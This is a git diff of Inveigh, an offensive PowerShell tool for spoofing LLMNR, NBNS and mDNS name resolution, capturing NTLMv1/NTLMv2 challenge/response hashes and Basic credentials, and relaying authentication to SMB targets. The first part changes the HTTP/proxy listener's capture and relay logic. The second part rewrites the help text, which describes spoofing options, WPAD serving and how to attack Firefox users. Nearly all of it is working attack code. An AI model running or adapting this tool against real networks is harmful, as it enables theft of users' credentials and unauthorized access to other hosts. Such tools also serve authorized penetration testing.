":" + $NTLM_challenge if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) + { $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { @@ -2971,7 +3287,7 @@ $HTTP_scriptblock = } else { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) @@ -2997,8 +3313,17 @@ $HTTP_scriptblock = if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } + + if($inveigh.log_output) + { + $inveigh.log.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)") + } if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { @@ -3006,7 +3331,7 @@ $HTTP_scriptblock = } else { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) @@ -3026,7 +3351,6 @@ $HTTP_scriptblock = $HTTP_response_status_code = 0x32,0x30,0x30 $HTTP_response_phrase = 0x4f,0x4b - $NTLM_auth = $true $HTTP_client_close = $true $NTLM_challenge = "" @@ -3042,26 +3366,35 @@ $HTTP_scriptblock = if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target") { - if($NTLM_type -eq 'NTLMv2') + if($inveigh.file_output) { - $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")]) - SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID - $relay_step = 0 + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target") } - else + + if($inveigh.log_output) { - $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")]) - SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID - $relay_step = 0 + $inveigh.log.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target") } + $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target") + SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID + $relay_step = 0 + } else { + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target") + } + $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")]) $SMB_relay_socket.Close() $relay_step = 0 } @@ -3069,8 +3402,18 @@ $HTTP_scriptblock = } else { + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account") + } + $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_user_string appears to be a machine account") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")]) $SMB_relay_socket.Close() $relay_step = 0 } @@ -3078,8 +3421,18 @@ $HTTP_scriptblock = } else { + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list") + } + $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on SMB relay username list") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")]) $SMB_relay_socket.Close() $relay_step = 0 } @@ -3088,32 +3441,18 @@ $HTTP_scriptblock = if($proxy_listener) { - $HTTP_client.Client.Close() + $HTTP_send = $false } } else { - $NTLM = "NTLM" $HTTP_client_close = $false } } - else - { - - if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') - { - $HTTP_client_close = $true - } - else - { - $HTTP_client_close = $false - } - - } - if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)}))) + if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))) { $HTTP_message = $WPADResponse $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") @@ -3124,15 +3463,10 @@ $HTTP_scriptblock = $HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) $HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) - if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth) + if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close) { $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM) } - else - { - $HTTP_response_status_code = 0x32,0x30,0x30 - $HTTP_response_phrase = 0x4f,0x4b - } $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary $packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)) @@ -3157,17 +3491,30 @@ $HTTP_scriptblock = $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a)) } - $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes) - $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse - $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) - $HTTP_stream.Flush() + if($HTTP_send) + { + $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes) + $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse + $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) + $HTTP_stream.Flush() + } + Start-Sleep -m 10 $HTTP_request_raw_URL_old = $HTTP_request_raw_URL $HTTP_client_handle_old = $HTTP_client.Client.Handle if($HTTP_client_close) { - $HTTP_client.Close() + + if($proxy_listener) + { + $HTTP_client.Client.Close() + } + else + { + $HTTP_client.Close() + } + } } @@ -3188,9 +3535,10 @@ $HTTP_scriptblock = $HTTP_listener.Stop() } +# Control Relay Loop ScriptBlock $control_relay_scriptblock = { - param ($RelayAutoExit,$RunTime) + param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime) function StopInveigh { @@ -3215,44 +3563,57 @@ $control_relay_scriptblock = catch { $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null if($inveigh.file_output) { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") } } } + + Start-Sleep -S 1 + $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')") - if($inveigh.running) + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") + } + + Start-Sleep -S 1 + $inveigh.running = $false + + if($inveigh.relay_running) { Start-Sleep -S 1 - $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") > $null - Start-Sleep -S 1 - $inveigh.running = $false + $inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')") if($inveigh.file_output) { - "$(Get-Date -format 's') - Inveigh exited due to $exit_message" | Out-File $Inveigh.log_out_file -Append + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") } - } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") + } - Start-Sleep -S 1 - $inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") > $null - Start-Sleep -S 1 - $inveigh.relay_running = $false + Start-Sleep -S 1 + $inveigh.relay_running = $false - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message" | Out-File $Inveigh.log_out_file -Append - } + } - $inveigh.HTTP = $false $inveigh.HTTPS = $false } @@ -3316,12 +3677,22 @@ $control_relay_scriptblock = } + if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0) + { + + while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output) + { + $inveigh.console_queue.RemoveAt(0) + } + + } + Start-Sleep -m 5 } } -# HTTP Listener Startup function +# HTTP Listener Startup Function function HTTPListener() { $HTTPS_listener = $false @@ -3340,13 +3711,14 @@ function HTTPListener() $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument( $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument( - $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument( + $WPADResponse) > $null $HTTP_powershell.BeginInvoke() > $null } Start-Sleep -m 50 -# HTTPS Listener Startup function +# HTTPS Listener Startup Function function HTTPSListener() { $HTTPS_listener = $true @@ -3365,13 +3737,14 @@ function HTTPSListener() $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument( $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument( - $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument( + $WPADResponse) > $null $HTTPS_powershell.BeginInvoke() > $null } Start-Sleep -m 50 -# Proxy Listener Startup function +# Proxy Listener Startup Function function ProxyListener() { $HTTPS_listener = $false @@ -3390,11 +3763,12 @@ function ProxyListener() $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument( $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument( - $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument( + $WPADResponse) > $null $proxy_powershell.BeginInvoke() > $null } -# Control Relay Startup function +# Control Relay Startup Function function ControlRelayLoop() { $control_relay_runspace = [RunspaceFactory]::CreateRunspace() @@ -3403,8 +3777,8 @@ function ControlRelayLoop() $control_relay_powershell = [PowerShell]::Create() $control_relay_powershell.Runspace = $control_relay_runspace $control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($RelayAutoExit).AddArgument( - $RunTime) > $null + $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument( + $RelayAutoExit).AddArgument($RunTime) > $null $control_relay_powershell.BeginInvoke() > $null } @@ -3427,11 +3801,12 @@ if($Proxy -eq 'Y') } # Control Relay Loop Start -if($RelayAutoExit -or $RunTime -or $inveigh.file_output) +if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $RelayAutoExit -or $RunTime) { ControlRelayLoop } +# Console Output Loop if($inveigh.console_output) { @@ -3635,44 +4010,57 @@ if($inveigh) catch { Write-Output("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null + } + } } if($inveigh.relay_running) { - $inveigh.relay_running = $false - Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + } + + Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") + $inveigh.relay_running = $false + } if($inveigh.running) { - $inveigh.running = $false - Write-Output("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null + } + + Write-Output("Inveigh exited at $(Get-Date -format 's')") + $inveigh.running = $false + } - $inveigh.HTTP = $false $inveigh.HTTPS = $false Start-Sleep -S 5 } diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index 51b7d84..037f15d 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -7,7 +7,7 @@ Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/respons .DESCRIPTION Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following features: - IPv4 LLMNR/NBNS spoofer with granular control + IPv4 LLMNR/mDNS/NBNS spoofer with granular control NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/Proxy/SMB Basic auth cleartext credential capture over HTTP/HTTPS/Proxy WPAD server capable of hosting a basic or custom wpad.dat file @@ -16,75 +16,39 @@ Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following fea Run time and run count control LLMNR/NBNS spoofer learning mode -.PARAMETER ElevatedPrivilege -Default = Auto: (Auto,Y,N) Set the privilege mode. Auto will determine if Inveigh is running with -elevated privilege. If so, options that require elevated privilege can be used. - -.PARAMETER IP -Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/NBNS spoofing if the -SpooferIP parameter is not set. - -.PARAMETER SpooferIP -IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other -than the Inveigh host. - -.PARAMETER SpooferHostsReply -Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferHostsIgnore -Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferIPsReply -Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferIPsIgnore -Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferLearning -Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out -LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the -hostname to a spoofing blacklist. - -.PARAMETER SpooferLearningDelay -(Integer) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through -SpooferLearning. - -.PARAMETER SpooferLearningInterval -Default = 30 Minutes: (Integer) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a -hostname that has already been checked if SpooferLearning is enabled. - -.PARAMETER SpooferRepeat -Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user -challenge/response has been captured. - -.PARAMETER LLMNR -Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. +.PARAMETER Challenge +Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random +challenge will be generated for each request. -.PARAMETER LLMNRTTL -Default = 30 Seconds: LLMNR TTL in seconds for the response packet. +.PARAMETER ConsoleOutput +Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a shell, test to +ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. -.PARAMETER NBNS -Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. +.PARAMETER ConsoleQueueLimit +Default = Unlimited: Maximum number of queued up console log entries when not using the real time console. -.PARAMETER NBNSTTL -Default = 165 Seconds: NBNS TTL in seconds for the response packet. +.PARAMETER ConsoleStatus +(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for +displaying full capture lists when running through a shell that does not have access to the support functions. -.PARAMETER NBNSTypes -Default = 00,20: Comma separated list of NBNS types to spoof. -Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name +.PARAMETER ConsoleUnique +Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time console output is enabled. -.PARAMETER NBNSBruteForce -Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. +.PARAMETER ElevatedPrivilege +Default = Auto: (Auto/Y/N) Set the privilege mode. Auto will determine if Inveigh is running with +elevated privilege. If so, options that require elevated privilege can be used. -.PARAMETER NBNSBruteForceHost -Default = WPAD: Hostname for the NBNS Brute Force spoofer. +.PARAMETER FileOutput +Default = Disabled: (Y/N) Enable/Disable real time file output. -.PARAMETER NBNSBruteForcePause -Default = Disabled: (Integer) Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming -HTTP request is received. +.PARAMETER FileOutputDirectory +Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must +also be enabled. -.PARAMETER NBNSBruteForceTarget -IP address to target for NBNS brute force spoofing. +.PARAMETER FileUnique +Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time file output is enabled. .PARAMETER HTTP Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. @@ -96,7 +60,7 @@ Default = Any: IP address for the HTTP/HTTPS listener. Default = 80: TCP port for the HTTP listener. .PARAMETER HTTPAuth -Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not apply to +Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. .PARAMETER HTTPBasicRealm @@ -122,8 +86,8 @@ This parameter will not be used if HTTPDir is set. Use PowerShell character esca .PARAMETER HTTPS Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in -the local store and attached to port specified IP and port. If the script does not exit gracefully, execute -"netsh http delete sslcert ipport=" with the correct IP and port and manually remove the certificate. +the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires +local administrator access. .PARAMETER HTTPSPort Default = 443: TCP port for the HTTPS listener. @@ -137,36 +101,70 @@ Default = localhost: The subject field for the cert that will be installed for H .PARAMETER HTTPSForceCertDelete Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. -.PARAMETER WPADAuth -Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to -Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. +.PARAMETER Inspect +(Switch) Inspect LLMNR an NBNS traffic only. With elevated privilege, SMB must be disabled with -smb if you do not +want NTLMv1/NTLMv2 captures over SMB. Without elevated privilege, the desired inspect listeners must be enabled +with -LLMNR and/or -NBNS. -.PARAMETER WPADIP -Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used -with WPADPort. +.PARAMETER IP +Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/NBNS spoofing if the +SpooferIP parameter is not set. -.PARAMETER WPADPort -Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be -used with WPADIP. +.PARAMETER LogOutput +Default = Enabled: (Y/N) Enable/Disable storing log messages in memory. -.PARAMETER WPADDirectFile -Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. -Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when -using WPADIP, WPADPort, or WPADResponse. +.PARAMETER LLMNR +Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. -.PARAMETER WPADDirectHosts -Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the -defined proxy. +.PARAMETER LLMNRTTL +Default = 30 Seconds: LLMNR TTL in seconds for the response packet. -.PARAMETER WPADResponse -wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort -are set. Use PowerShell character escapes where necessary. +.PARAMETER MachineAccounts +Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. + +.PARAMETER mDNS +Default = Disabled: (Y/N) Enable/Disable mDNS QU spoofing. + +.PARAMETER mDNSTTL +Default = 120 Seconds: mDNS TTL in seconds for the response packet. + +.PARAMETER mDNSTypes +Default = QU: Comma separated list of mDNS types to spoof. Note that QM will send the response to 224.0.0.251. +Types include QU = Query Unicast, QM = Query Multicast + +.PARAMETER NBNS +Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. + +.PARAMETER NBNSBruteForce +Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. + +.PARAMETER NBNSBruteForceHost +Default = WPAD: Hostname for the NBNS Brute Force spoofer. + +.PARAMETER NBNSBruteForcePause +Default = Disabled: (Integer) Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming +HTTP request is received. + +.PARAMETER NBNSBruteForceTarget +IP address to target for NBNS brute force spoofing. + +.PARAMETER NBNSTTL +Default = 165 Seconds: NBNS TTL in seconds for the response packet. + +.PARAMETER NBNSTypes +Default = 00,20: Comma separated list of NBNS types to spoof. +Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name + +.PARAMETER OutputStreamOnly +Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if +running Inveigh through a shell that does not return other output streams.Note that you will not see the various +yellow warning messages if enabled. .PARAMETER Proxy Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures. .PARAMETER ProxyAuth -Default = NTLM: (Basic,NTLM,NTLMNoESS) Proxy server authentication type. +Default = NTLM: (Basic/NTLM/NTLMNoESS) Proxy server authentication type. .PARAMETER ProxyIP Default = Any: IP address for the proxy listener. @@ -180,50 +178,54 @@ will not be sent the wpad.dat file used for capturing proxy authentications. Fir with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by -closing and reopening. +closing and reopening. + +.PARAMETER ShowHelp +Default = Enabled: (Y/N) Enable/Disable the help messages at startup. .PARAMETER SMB Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host. -.PARAMETER Challenge -Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random -challenge will be generated for each request. +.PARAMETER SpooferHostsIgnore +Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. -.PARAMETER MachineAccounts -Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. +.PARAMETER SpooferHostsReply +Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. -.PARAMETER ConsoleOutput -Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to -ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. +.PARAMETER SpooferIP +IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other +than the Inveigh host. -.PARAMETER ConsoleStatus -(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for -displaying full capture lists when running through a shell that does not have access to the support functions. +.PARAMETER SpooferIPsIgnore +Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. -.PARAMETER ConsoleUnique -Default = Enabled: (Y/N) Enable/Disable displaying 